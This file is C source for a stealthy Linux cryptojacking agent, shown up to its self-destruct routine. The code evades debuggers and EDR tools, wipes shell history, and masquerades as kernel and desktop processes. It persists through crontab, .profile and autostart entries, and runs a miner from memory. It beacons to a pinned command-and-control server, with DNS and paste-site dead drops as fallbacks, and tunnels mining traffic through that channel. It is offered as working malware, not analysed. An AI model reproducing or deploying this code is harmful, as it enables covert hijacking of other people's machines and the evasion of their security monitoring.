/* phantom.c — Polymorphic Reflective Loader/Agent
 * Target:  Linux x86_64, glibc >= 2.17 or musl
 * Build:   Generated by morph.py mutation engine
 *          DO NOT compile this file directly.
 * Author:  ♥
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <signal.h>
#include <fcntl.h>
#include <sched.h>
#include <dirent.h>
#include <pthread.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <sys/sysinfo.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <curl/curl.h>
#include <openssl/evp.h>
#include <openssl/rand.h>
#include <openssl/sha.h>
#include <openssl/ssl.h>
#include <openssl/x509.h>

/* ═══════════════════════════════════════════════════════════════════════════
 * Build-Unique Encrypted Configuration
 * Replaced by morph.py before each compilation.
 * AES-256-CTR, key & IV unique per build.
 * ═══════════════════════════════════════════════════════════════════════════ */

static const uint8_t EK[32] = { /*MORPH_KEY*/ };
static const uint8_t EIV[16] = { /*MORPH_IV*/ };
static const uint8_t CB[] = { /*MORPH_CFG*/ };
static const uint32_t CB_LEN = sizeof(CB);

/* Certificate fingerprint for C2 pinning (SHA-256 of DER-encoded cert) */
static const uint8_t C2_CERT_FP[32] = { /*MORPH_CERT_FP*/ };

/* ═══════════════════════════════════════════════════════════════════════════
 * Constants & Magic Numbers
 * ═══════════════════════════════════════════════════════════════════════════ */

#define SYS_memfd_create  319   /* 0x13F */
#define SYS_execveat      322   /* 0x142 */
#define AT_EMPTY_PATH      0x1000
#ifndef MFD_CLOEXEC
#define MFD_CLOEXEC        0x1
#endif

#define MAX_PATH          1024
#define MAX_CMDLINE       256
#define MAX_URL           256
#define MAX_AGENT_ID       65
#define MAX_CRON_ENTRY    512
#define MAX_PROFILE_HOOK  512
#define MAX_XDG_DESKTOP  1024

#define HEARTBEAT_TIMEOUT  120
#define GOVERNOR_INTERVAL   2
#define MAX_C2_FAILURES     10
#define BEACON_TIMEOUT      30
#define TUNNEL_TIMEOUT      10
#define DEAD_DROP_TIMEOUT   15

/* ═══════════════════════════════════════════════════════════════════════════
 * Configuration Structure
 * ═══════════════════════════════════════════════════════════════════════════ */

struct phantom_cfg {
    char     c2_url[MAX_URL];
    char     c2_fallback_dns[128];
    char     c2_fallback_paste[MAX_URL];
    char     proc_name[16];
    char     proc_cmdline[MAX_CMDLINE];
    char     cron_entry[MAX_CRON_ENTRY];
    char     profile_hook[MAX_PROFILE_HOOK];
    char     xdg_desktop[MAX_XDG_DESKTOP];
    char     agent_id[MAX_AGENT_ID];
    uint32_t beacon_base_sec;
    float    beacon_jitter;
    uint16_t tunnel_port;
    uint8_t  max_cpu_pct;
    char     self_path[MAX_PATH];
};

/* ═══════════════════════════════════════════════════════════════════════════
 * Global State
 * ═══════════════════════════════════════════════════════════════════════════ */

extern char **environ;

static struct phantom_cfg G;
static volatile pid_t g_miner_pid  = -1;
static volatile pid_t g_guardian   = -1;
static volatile int   g_running    = 1;
static char          *g_argv0_base = NULL;
static size_t         g_argv_space = 0;

/* ═══════════════════════════════════════════════════════════════════════════
 * Configuration Decryption — AES-256-CTR
 * ═══════════════════════════════════════════════════════════════════════════ */

static int unseal(void) {
    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    if (!ctx) return -1;

    uint8_t plaintext[sizeof(struct phantom_cfg)];
    int outl = 0, total = 0;

    if (EVP_DecryptInit_ex(ctx, EVP_aes_256_ctr(), NULL, EK, EIV) != 1) {
        EVP_CIPHER_CTX_free(ctx);
        return -1;
    }

    if (EVP_DecryptUpdate(ctx, plaintext, &outl, CB, CB_LEN) != 1) {
        EVP_CIPHER_CTX_free(ctx);
        explicit_bzero(plaintext, sizeof(plaintext));
        return -1;
    }
    total += outl;

    if (EVP_DecryptFinal_ex(ctx, plaintext + total, &outl) != 1) {
        EVP_CIPHER_CTX_free(ctx);
        explicit_bzero(plaintext, sizeof(plaintext));
        return -1;
    }
    total += outl;
    EVP_CIPHER_CTX_free(ctx);

    if ((size_t)total < sizeof(struct phantom_cfg)) {
        explicit_bzero(plaintext, sizeof(plaintext));
        return -1;
    }

    memcpy(&G, plaintext, sizeof(struct phantom_cfg));
    explicit_bzero(plaintext, sizeof(plaintext));
    return 0;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Pre-Flight Environment Scan
 * ═══════════════════════════════════════════════════════════════════════════ */

static const char *hostile_procs[] = {
    "falcon-sensor", "cbagentd", "ossec-agent",
    "wazuh-agent", "crowdstrike", "sentinel_agent",
    "sysdig", "falco", "auditd", "osqueryd",
    NULL
};

static int check_tracer_pid(void) {
    char status_path[64];
    snprintf(status_path, sizeof(status_path), "/proc/%d/status", getpid());

    FILE *sf = fopen(status_path, "r");
    if (!sf) return 0;

    char line[256];
    int result = 0;

    while (fgets(line, sizeof(line), sf)) {
        if (strncmp(line, "TracerPid:", 10) == 0) {
            long tracer = strtol(line + 10, NULL, 10);
            if (tracer != 0) result = -1;
            break;
        }
    }
    fclose(sf);
    return result;
}

static int scan_hostile_processes(void) {
    DIR *proc = opendir("/proc");
    if (!proc) return -1;

    struct dirent *ent;
    char comm_path[128], comm_buf[256];

    while ((ent = readdir(proc)) != NULL) {
        if (ent->d_type != DT_DIR) continue;

        char *endp;
        long pid = strtol(ent->d_name, &endp, 10);
        if (*endp != '\0' || pid <= 0) continue;

        snprintf(comm_path, sizeof(comm_path), "/proc/%ld/comm", pid);
        FILE *cf = fopen(comm_path, "r");
        if (!cf) continue;

        if (fgets(comm_buf, sizeof(comm_buf), cf)) {
            comm_buf[strcspn(comm_buf, "\n")] = '\0';
            for (const char **hp = hostile_procs; *hp; hp++) {
                if (strstr(comm_buf, *hp)) {
                    fclose(cf);
                    closedir(proc);
                    return -1;
                }
            }
        }
        fclose(cf);
    }
    closedir(proc);
    return 0;
}

static int check_cgroup_quota(void) {
    FILE *cq = fopen("/sys/fs/cgroup/cpu/cpu.cfs_quota_us", "r");
    if (!cq) cq = fopen("/sys/fs/cgroup/cpu.max", "r");

    if (cq) {
        long quota;
        int valid = fscanf(cq, "%ld", &quota);
        fclose(cq);
        if (valid == 1 && quota > 0 && quota < 50000)
            return -1;
    }
    return 0;
}

static int preflight(void) {
    if (check_tracer_pid() != 0) return -1;
    if (scan_hostile_processes() != 0) return -1;
    if (check_cgroup_quota() != 0) return -1;
    return 0;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Log Suppression
 * ═══════════════════════════════════════════════════════════════════════════ */

static void truncate_history_files(const char *home) {
    static const char *hist_files[] = {
        ".bash_history", ".zsh_history",
        ".sh_history", ".history", NULL
    };

    char hpath[512];
    for (const char **hf = hist_files; *hf; hf++) {
        snprintf(hpath, sizeof(hpath), "%s/%s", home, *hf);
        int fd = open(hpath, O_WRONLY | O_TRUNC);
        if (fd >= 0) close(fd);
    }
}

static void silence(void) {
    unsetenv("HISTFILE");
    setenv("HISTSIZE", "0", 1);
    setenv("HISTFILESIZE", "0", 1);

    char *home = getenv("HOME");
    if (home) truncate_history_files(home);

    int devnull = open("/dev/null", O_RDWR);
    if (devnull >= 0) {
        dup2(devnull, STDIN_FILENO);
        close(devnull);
    }
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Process Masquerade
 * ═══════════════════════════════════════════════════════════════════════════ */

static void compute_argv_region(int argc, char **argv, char **envp,
                                char **start_out, size_t *space_out) {
    char *arg_start = argv[0];
    char *arg_end   = argv[0];

    for (int i = 0; i < argc; i++) {
        char *end = argv[i] + strlen(argv[i]) + 1;
        if (end > arg_end) arg_end = end;
    }

    if (envp) {
        for (int i = 0; envp[i]; i++) {
            char *end = envp[i] + strlen(envp[i]) + 1;
            if (end > arg_end) arg_end = end;
        }
    }

    *start_out = arg_start;
    *space_out = (size_t)(arg_end - arg_start);
}

static void shed_skin(int argc, char **argv, char **envp) {
    compute_argv_region(argc, argv, envp, &g_argv0_base, &g_argv_space);

    memset(g_argv0_base, 0, g_argv_space);
    strncpy(g_argv0_base, G.proc_cmdline, g_argv_space - 1);

    prctl(PR_SET_NAME, (unsigned long)G.proc_name, 0, 0, 0);
    setsid();
    setpriority(PRIO_PROCESS, 0, 19);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Filesystem Utilities
 * ═══════════════════════════════════════════════════════════════════════════ */

static void mkdir_p(const char *path) {
    char tmp[MAX_PATH + 64];
    snprintf(tmp, sizeof(tmp), "%s", path);

    for (char *p = tmp + 1; *p; p++) {
        if (*p == '/') {
            *p = '\0';
            mkdir(tmp, 0700);
            *p = '/';
        }
    }
    mkdir(tmp, 0700);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Persistence — Crontab Manipulation
 * ═══════════════════════════════════════════════════════════════════════════ */

static int crontab_read(char *buf, size_t buf_sz, size_t *len_out) {
    FILE *rd = popen("crontab -l 2>/dev/null", "r");
    if (!rd) {
        *len_out = 0;
        return 0;
    }
    *len_out = fread(buf, 1, buf_sz - 1, rd);
    pclose(rd);
    buf[*len_out] = '\0';
    return 0;
}

static int crontab_write(const char *content, size_t len) {
    FILE *wr = popen("crontab -", "w");
    if (!wr) return -1;
    fwrite(content, 1, len, wr);
    pclose(wr);
    return 0;
}

static int crontab_contains_marker(const char *buf, size_t len) {
    return (len > 0 && strstr(buf, G.agent_id) != NULL);
}

static int crontab_add_entry(void) {
    char existing[8192] = {0};
    size_t elen = 0;

    crontab_read(existing, sizeof(existing), &elen);
    if (crontab_contains_marker(existing, elen)) return 0;

    char newbuf[sizeof(existing) + MAX_CRON_ENTRY + 64];
    int n = snprintf(newbuf, sizeof(newbuf), "%s\n# %s\n%s\n",
                     existing, G.agent_id, G.cron_entry);
    if (n < 0) return -1;
    size_t written = ((size_t)n < sizeof(newbuf)) ? (size_t)n : sizeof(newbuf) - 1;
    return crontab_write(newbuf, written);
}

static int crontab_remove_entry(void) {
    char existing[8192] = {0};
    size_t elen = 0;

    crontab_read(existing, sizeof(existing), &elen);
    if (elen == 0) return 0;

    char filtered[sizeof(existing)] = {0};
    size_t filt_off = 0;
    char *line = strtok(existing, "\n");

    while (line) {
        if (!strstr(line, G.agent_id)) {
            int w = snprintf(filtered + filt_off,
                             sizeof(filtered) - filt_off, "%s\n", line);
            if (w > 0) filt_off += (size_t)w;
        }
        line = strtok(NULL, "\n");
    }

    return crontab_write(filtered, filt_off);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Persistence — Profile Hook
 * ═══════════════════════════════════════════════════════════════════════════ */

static int profile_add_entry(const char *home) {
    char path[MAX_PATH + 32];
    snprintf(path, sizeof(path), "%s/.profile", home);

    FILE *pf = fopen(path, "r");
    if (pf) {
        char line[MAX_CMDLINE];
        while (fgets(line, sizeof(line), pf)) {
            if (strstr(line, G.agent_id)) {
                fclose(pf);
                return 0;
            }
        }
        fclose(pf);
    }

    FILE *af = fopen(path, "a");
    if (!af) return -1;
    fprintf(af, "\n# %s\n%s\n", G.agent_id, G.profile_hook);
    fclose(af);
    return 0;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Persistence — XDG Autostart
 * ═══════════════════════════════════════════════════════════════════════════ */

static int xdg_autostart_install(const char *home) {
    char path[MAX_PATH + 64];
    snprintf(path, sizeof(path), "%s/.config/autostart", home);
    mkdir_p(path);

    snprintf(path, sizeof(path),
             "%s/.config/autostart/dbus-session-update.desktop", home);

    FILE *xf = fopen(path, "w");
    if (!xf) return -1;
    fprintf(xf, "%s", G.xdg_desktop);
    fclose(xf);
    return 0;
}

static int xdg_autostart_remove(const char *home) {
    char path[MAX_PATH + 64];
    snprintf(path, sizeof(path),
             "%s/.config/autostart/dbus-session-update.desktop", home);
    return unlink(path);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Persistence Triad — Install/Remove
 * ═══════════════════════════════════════════════════════════════════════════ */

static int entrench(const char *home) {
    if (!home) return -1;

    crontab_add_entry();
    profile_add_entry(home);
    xdg_autostart_install(home);

    return 0;
}

static void remove_persistence(void) {
    // We try to re-read HOME, but if shed_skin wiped it, we might fail.
    // Ideally we'd store HOME in G. But for now, we rely on cached or lucky environment.
    // In scorched_earth, we might be running as child or parent.
    char *home = getenv("HOME");
    if (!home) return;

    crontab_remove_entry();
    xdg_autostart_remove(home);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Reflective Loader — memfd_create + execveat
 * ═══════════════════════════════════════════════════════════════════════════ */

static int create_memfd(void) {
    int memfd = (int)syscall(SYS_memfd_create, "", MFD_CLOEXEC);
    if (memfd >= 0) return memfd;

    /* Fallback: /dev/shm with random name, unlinked immediately */
    char shm_path[64];
    uint32_t r;
    RAND_bytes((unsigned char *)&r, 4);
    snprintf(shm_path, sizeof(shm_path), "/dev/shm/.X%08x-lock", r);

    memfd = open(shm_path, O_RDWR | O_CREAT | O_EXCL, 0700);
    if (memfd < 0) return -1;

    unlink(shm_path);
    return memfd;
}

static int write_elf_to_memfd(int memfd, const uint8_t *elf, size_t elf_len) {
    size_t off = 0;
    while (off < elf_len) {
        ssize_t w = write(memfd, elf + off, elf_len - off);
        if (w <= 0) return -1;
        off += (size_t)w;
    }
    return 0;
}

static pid_t phantom_exec(const uint8_t *elf, size_t elf_len,
                          const char *disguise_name) {
    int memfd = create_memfd();
    if (memfd < 0) return -1;

    if (write_elf_to_memfd(memfd, elf, elf_len) != 0) {
        close(memfd);
        return -1;
    }

    pid_t child = fork();
    if (child == 0) {
        prctl(PR_SET_NAME, (unsigned long)disguise_name, 0, 0, 0);
        setpriority(PRIO_PROCESS, 0, 19);

        char port_str[8];
        snprintf(port_str, sizeof(port_str), "%u", G.tunnel_port);

        char *miner_argv[] = {
            (char *)disguise_name,
            "--no-color",
            "--threads", "1",
            "-o", "127.0.0.1",
            "-p", port_str,
            "--tls", "0",
            NULL
        };

        syscall(SYS_execveat, memfd, "", miner_argv, environ, AT_EMPTY_PATH);

        /* Fallback path via /proc/self/fd */
        char fd_link[64];
        snprintf(fd_link, sizeof(fd_link), "/proc/self/fd/%d", memfd);
        execv(fd_link, miner_argv);

        _exit(127);
    }

    close(memfd);
    return child;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * C2 Beacon — HTTPS with JA3 Mimicry and Certificate Pinning
 * ═══════════════════════════════════════════════════════════════════════════ */

#define JA3_CIPHERS \
    "TLS_AES_128_GCM_SHA256:"       \
    "TLS_AES_256_GCM_SHA384:"       \
    "TLS_CHACHA20_POLY1305_SHA256:" \
    "ECDHE-ECDSA-AES128-GCM-SHA256:"\
    "ECDHE-RSA-AES128-GCM-SHA256:"  \
    "ECDHE-ECDSA-AES256-GCM-SHA384:"\
    "ECDHE-RSA-AES256-GCM-SHA384"

struct c2_rx {
    uint8_t *buf;
    size_t   len;
    size_t   cap;
};

static size_t rx_callback(void *data, size_t sz, size_t nmemb, void *usr) {
    struct c2_rx *rx = (struct c2_rx *)usr;
    size_t chunk = sz * nmemb;

    if (rx->len + chunk >= rx->cap) {
        size_t new_cap = (rx->len + chunk + 1) * 2;
        uint8_t *tmp = realloc(rx->buf, new_cap);
        if (!tmp) {
            free(rx->buf);
            rx->buf = NULL;
            rx->len = 0;
            return 0;
        }
        rx->buf = tmp;
        rx->cap = new_cap;
    }

    memcpy(rx->buf + rx->len, data, chunk);
    rx->len += chunk;
    rx->buf[rx->len] = '\0';
    return chunk;
}

static int ct_memcmp(const volatile uint8_t *a, const uint8_t *b, size_t len) {
    volatile uint8_t diff = 0;
    for (size_t i = 0; i < len; i++)
        diff |= a[i] ^ b[i];
    return diff;
}

/*
 * Certificate verification callback — invoked per-connection via
 * CURLOPT_SSL_CTX_FUNCTION.  We install a custom X509 verify callback
 * on the SSL_CTX so that when the handshake completes, we can inspect
 * the leaf certificate and compare its SHA-256 digest against our
 * pinned fingerprint (C2_CERT_FP).
 */
static int verify_pin_cb(int preverify_ok, X509_STORE_CTX *x509_ctx) {
    (void)preverify_ok;

    /* Only inspect depth 0 — the leaf / server certificate */
    if (X509_STORE_CTX_get_error_depth(x509_ctx) != 0)
        return preverify_ok;

    X509 *cert = X509_STORE_CTX_get_current_cert(x509_ctx);
    if (!cert) return 0;

    unsigned char fp[EVP_MAX_MD_SIZE];
    unsigned int  fp_len = 0;

    if (!X509_digest(cert, EVP_sha256(), fp, &fp_len) || fp_len != 32)
        return 0;

    return (ct_memcmp(fp, C2_CERT_FP, 32) == 0) ? 1 : 0;
}

static CURLcode pin_callback(CURL *easy, void *sslctx, void *userdata) {
    (void)easy;
    (void)userdata;

    SSL_CTX *ctx = (SSL_CTX *)sslctx;
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, verify_pin_cb);
    return CURLE_OK;
}

static struct curl_slist *setup_curl_headers(CURL *curl) {
    struct curl_slist *hdrs = NULL;
    hdrs = curl_slist_append(hdrs,
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) "
        "Gecko/20100101 Firefox/121.0");
    hdrs = curl_slist_append(hdrs, "Accept: application/json");
    hdrs = curl_slist_append(hdrs, "Content-Type: application/json");
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs);
    return hdrs;
}

static void setup_curl_ssl(CURL *curl) {
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1L);
    curl_easy_setopt(curl, CURLOPT_SSL_CTX_FUNCTION, pin_callback);
    curl_easy_setopt(curl, CURLOPT_SSL_CIPHER_LIST, JA3_CIPHERS);
    curl_easy_setopt(curl, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_3);
}

static int beacon_cycle(uint8_t **payload_out, size_t *payload_len_out,
                        char *cmd_out) {
    CURL *curl = curl_easy_init();
    if (!curl) return -1;

    struct c2_rx rx = { .buf = malloc(4096), .len = 0, .cap = 4096 };
    if (!rx.buf) {
        curl_easy_cleanup(curl);
        return -1;
    }

    char postbody[1024];
    struct sysinfo si;
    sysinfo(&si);
    double loadavg[3];
    getloadavg(loadavg, 3);

    snprintf(postbody, sizeof(postbody),
             "{\"id\":\"%s\",\"up\":%ld,\"load\":%.2f,\"mp\":%d}",
             G.agent_id, si.uptime, loadavg[0],
             (g_miner_pid > 0) ? 1 : 0);

    curl_easy_setopt(curl, CURLOPT_URL, G.c2_url);
    curl_easy_setopt(curl, CURLOPT_POST, 1L);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postbody);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, rx_callback);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &rx);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, (long)BEACON_TIMEOUT);

    setup_curl_ssl(curl);
    struct curl_slist *hdrs = setup_curl_headers(curl);

    CURLcode res = curl_easy_perform(curl);
    curl_slist_free_all(hdrs);
    curl_easy_cleanup(curl);

    if (res != CURLE_OK) {
        free(rx.buf);
        return -1;
    }

    if (rx.len > 0) {
        cmd_out[0] = (char)rx.buf[0];
        if (rx.len > 1 && payload_out) {
            *payload_len_out = rx.len - 1;
            *payload_out = malloc(*payload_len_out);
            if (*payload_out) {
                memcpy(*payload_out, rx.buf + 1, *payload_len_out);
            }
        }
    }

    free(rx.buf);
    return 0;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Base64 Decoding — Runtime Computed Table
 * ═══════════════════════════════════════════════════════════════════════════ */

static int b64_value(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

static size_t base64_decode(const char *in, size_t in_len, uint8_t *out) {
    size_t i, j;
    int v0, v1, v2, v3;

    for (i = 0, j = 0; i + 3 < in_len; i += 4) {
        v0 = b64_value((unsigned char)in[i]);
        v1 = b64_value((unsigned char)in[i+1]);
        v2 = b64_value((unsigned char)in[i+2]);
        v3 = b64_value((unsigned char)in[i+3]);

        if (v0 < 0 || v1 < 0) break;

        out[j++] = (uint8_t)((v0 << 2) | (v1 >> 4));

        if (v2 >= 0) {
            out[j++] = (uint8_t)(((v1 & 0x0F) << 4) | (v2 >> 2));
            if (v3 >= 0)
                out[j++] = (uint8_t)(((v2 & 0x03) << 6) | v3);
        }
    }
    return j;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Dead Drop Fallback — DNS TXT + Paste Site C2 Recovery
 * ═══════════════════════════════════════════════════════════════════════════ */

static int decrypt_c2_url(const char *encoded, uint8_t *out, size_t *out_len) {
    uint8_t cipher_buf[512];
    size_t cipher_len = base64_decode(encoded, strlen(encoded), cipher_buf);

    if (cipher_len == 0 || cipher_len > sizeof(cipher_buf)) return -1;

    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    if (!ctx) return -1;

    int dec_len = 0, total = 0;

    if (EVP_DecryptInit_ex(ctx, EVP_aes_256_ctr(), NULL, EK, EIV) != 1) {
        EVP_CIPHER_CTX_free(ctx);
        return -1;
    }

    EVP_DecryptUpdate(ctx, out, &dec_len, cipher_buf, (int)cipher_len);
    total += dec_len;
    EVP_DecryptFinal_ex(ctx, out + total, &dec_len);
    total += dec_len;
    EVP_CIPHER_CTX_free(ctx);

    *out_len = (size_t)total;
    out[total] = '\0';
    return 0;
}

static char *strip_quotes(char *str) {
    while (*str == '"' || *str == ' ' || *str == '\t') str++;

    char *end = str + strlen(str) - 1;
    while (end > str &&
           (*end == '"' || *end == ' ' || *end == '\n' || *end == '\r')) {
        end--;
    }
    *(end + 1) = '\0';
    return str;
}

static int try_dns_dead_drop(char *new_c2_url, size_t url_sz) {
    char cmd[512], txtbuf[1024] = {0};
    snprintf(cmd, sizeof(cmd), "dig +short TXT %s 2>/dev/null",
             G.c2_fallback_dns);

    FILE *p = popen(cmd, "r");
    if (!p) return -1;

    int success = -1;
    if (fgets(txtbuf, sizeof(txtbuf), p)) {
        pclose(p);

        char *start = strip_quotes(txtbuf);
        uint8_t decoded_buf[512];
        size_t decoded_len = 0;

        if (strlen(start) > 10 &&
            decrypt_c2_url(start, decoded_buf, &decoded_len) == 0) {
            strncpy(new_c2_url, (char *)decoded_buf, url_sz - 1);
            new_c2_url[url_sz - 1] = '\0';
            explicit_bzero(decoded_buf, sizeof(decoded_buf));
            success = 0;
        }
    } else {
        pclose(p);
    }

    return success;
}

static int try_paste_dead_drop(char *new_c2_url, size_t url_sz) {
    CURL *curl = curl_easy_init();
    if (!curl) return -1;

    struct c2_rx rx = { .buf = malloc(4096), .len = 0, .cap = 4096 };
    if (!rx.buf) {
        curl_easy_cleanup(curl);
        return -1;
    }

    curl_easy_setopt(curl, CURLOPT_URL, G.c2_fallback_paste);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, rx_callback);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &rx);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, (long)DEAD_DROP_TIMEOUT);

    CURLcode res = curl_easy_perform(curl);
    curl_easy_cleanup(curl);

    int success = -1;
    if (res == CURLE_OK && rx.len > 0) {
        char *marker = strstr((char *)rx.buf, "<!--cfg:");
        if (marker) {
            marker += 8;
            char *end = strstr(marker, ":-->");
            if (end) {
                *end = '\0';
                uint8_t decoded_buf[512];
                size_t decoded_len = 0;

                if (decrypt_c2_url(marker, decoded_buf, &decoded_len) == 0) {
                    strncpy(new_c2_url, (char *)decoded_buf, url_sz - 1);
                    new_c2_url[url_sz - 1] = '\0';
                    explicit_bzero(decoded_buf, sizeof(decoded_buf));
                    success = 0;
                }
            }
        }
    }

    free(rx.buf);
    return success;
}

static int resolve_dead_drop(char *new_c2_url, size_t url_sz) {
    if (try_dns_dead_drop(new_c2_url, url_sz) == 0) return 0;
    return try_paste_dead_drop(new_c2_url, url_sz);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Adaptive Resource Governor
 * ═══════════════════════════════════════════════════════════════════════════ */

static void parse_proc_stat(long *idle_out, long *total_out) {
    FILE *f = fopen("/proc/stat", "r");
    if (!f) return;

    char line[256];
    if (fgets(line, sizeof(line), f)) {
        long user, nice, sys, idle, iowait, irq, sirq, steal;
        sscanf(line, "cpu %ld %ld %ld %ld %ld %ld %ld %ld",
               &user, &nice, &sys, &idle, &iowait, &irq, &sirq, &steal);
        *idle_out  = idle + iowait;
        *total_out = user + nice + sys + idle + iowait + irq + sirq + steal;
    }
    fclose(f);
}

static double calculate_cpu_usage(long prev_idle, long prev_total,
                                  long cur_idle, long cur_total) {
    long d_total = cur_total - prev_total;
    long d_idle  = cur_idle  - prev_idle;

    if (d_total <= 0) return 0.0;
    return 100.0 * (1.0 - ((double)d_idle / (double)d_total));
}

static void govern(pid_t miner) {
    long prev_idle = 0, prev_total = 0;
    int consecutive_hot = 0;
    int miner_stopped = 0;

    while (g_running && miner > 0) {
        long cur_idle = 0, cur_total = 0;
        parse_proc_stat(&cur_idle, &cur_total);

        double usage = calculate_cpu_usage(prev_idle, prev_total,
                                           cur_idle, cur_total);

        prev_idle  = cur_idle;
        prev_total = cur_total;

        if (usage > (double)G.max_cpu_pct) {
            consecutive_hot++;
            if (!miner_stopped && consecutive_hot >= 3) {
                kill(miner, SIGSTOP);
                miner_stopped = 1;
            }
        } else {
            consecutive_hot = 0;
            if (miner_stopped) {
                kill(miner, SIGCONT);
                miner_stopped = 0;
            }
        }

        unsigned int sleep_sec = GOVERNOR_INTERVAL +
            (unsigned int)(6.0 * (usage / 100.0));
        sleep(sleep_sec);
    }

    if (miner_stopped && miner > 0)
        kill(miner, SIGCONT);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Stratum Tunnel — Relay Mining Traffic Through C2 Channel
 * ═══════════════════════════════════════════════════════════════════════════ */

static void tunnel_relay(int client_fd) {
    char rxbuf[4096];

    while (g_running) {
        ssize_t n = recv(client_fd, rxbuf, sizeof(rxbuf) - 1, 0);
        if (n <= 0) break;
        rxbuf[n] = '\0';

        CURL *curl = curl_easy_init();
        if (!curl) continue;

        struct c2_rx rx = { .buf = malloc(4096), .len = 0, .cap = 4096 };
        if (!rx.buf) {
            curl_easy_cleanup(curl);
            continue;
        }

        char relay_url[MAX_URL + 8];
        snprintf(relay_url, sizeof(relay_url), "%s/s", G.c2_url);

        curl_easy_setopt(curl, CURLOPT_URL, relay_url);
        curl_easy_setopt(curl, CURLOPT_POST, 1L);
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, rxbuf);
        curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)n);
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, rx_callback);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, &rx);
        curl_easy_setopt(curl, CURLOPT_SSL_CIPHER_LIST, JA3_CIPHERS);
        curl_easy_setopt(curl, CURLOPT_TIMEOUT, (long)TUNNEL_TIMEOUT);

        struct curl_slist *h = NULL;
        h = curl_slist_append(h, "Content-Type: application/octet-stream");
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);

        CURLcode res = curl_easy_perform(curl);
        curl_slist_free_all(h);
        curl_easy_cleanup(curl);

        if (res == CURLE_OK && rx.len > 0)
            send(client_fd, rx.buf, rx.len, 0);

        free(rx.buf);
    }
    close(client_fd);
}

static void *tunnel_listener(void *arg) {
    (void)arg;

    int srv = socket(AF_INET, SOCK_STREAM, 0);
    if (srv < 0) return NULL;

    int opt = 1;
    setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    struct sockaddr_in addr = {
        .sin_family      = AF_INET,
        .sin_port        = htons(G.tunnel_port),
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK)
    };

    if (bind(srv, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
        close(srv);
        return NULL;
    }

    listen(srv, 1);

    while (g_running) {
        int client = accept(srv, NULL, NULL);
        if (client >= 0)
            tunnel_relay(client);
    }
    close(srv);
    return NULL;
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Guardian / Watchdog — Dual-Process Mutual Monitoring
 * ═══════════════════════════════════════════════════════════════════════════ */

static void guardian_loop(const char *self_path, int heartbeat_rd) {
    struct timeval tv;
    fd_set fds;
    char beat;

    while (1) {
        FD_ZERO(&fds);
        FD_SET(heartbeat_rd, &fds);
        tv.tv_sec = HEARTBEAT_TIMEOUT;
        tv.tv_usec = 0;

        int ret = select(heartbeat_rd + 1, &fds, NULL, NULL, &tv);
        if (ret <= 0) {
            /* Main agent died — respawn */
            pid_t child = fork();
            if (child == 0) {
                char *argv[] = { (char *)G.proc_cmdline, NULL };
                execv(self_path, argv);
                _exit(127);
            }
            break;
        }
        read(heartbeat_rd, &beat, 1);
    }
}

static int spawn_guardian(const char *self_path) {
    int pipefd[2];
    if (pipe(pipefd) < 0) return -1;

    pid_t guar = fork();
    if (guar == 0) {
        close(pipefd[1]);
        prctl(PR_SET_NAME, (unsigned long)"kworker/1:2", 0, 0, 0);
        setsid();
        guardian_loop(self_path, pipefd[0]);
        _exit(0);
    }

    close(pipefd[0]);
    g_guardian = guar;
    return pipefd[1];
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Scorched Earth — Complete Self-Destruction
 * ═══════════════════════════════════════════════════════════════════════════ */

static void overwrite_file(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0) return;

    int fd = open(path, O_WRONLY);
    if (fd < 0) return;

    uint8_t junk[4096];
    off_t remaining = st.st_size;

    while (remaining > 0) {
        RAND_bytes(junk, sizeof(junk));
        size_t to_write = (size_t)remaining < sizeof(junk) ?
                          (size_t)remaining : sizeof(junk);
        ssize_t w = write(fd, junk, to_write);
        if (w <= 0) break;
        remaining -= w;
    }
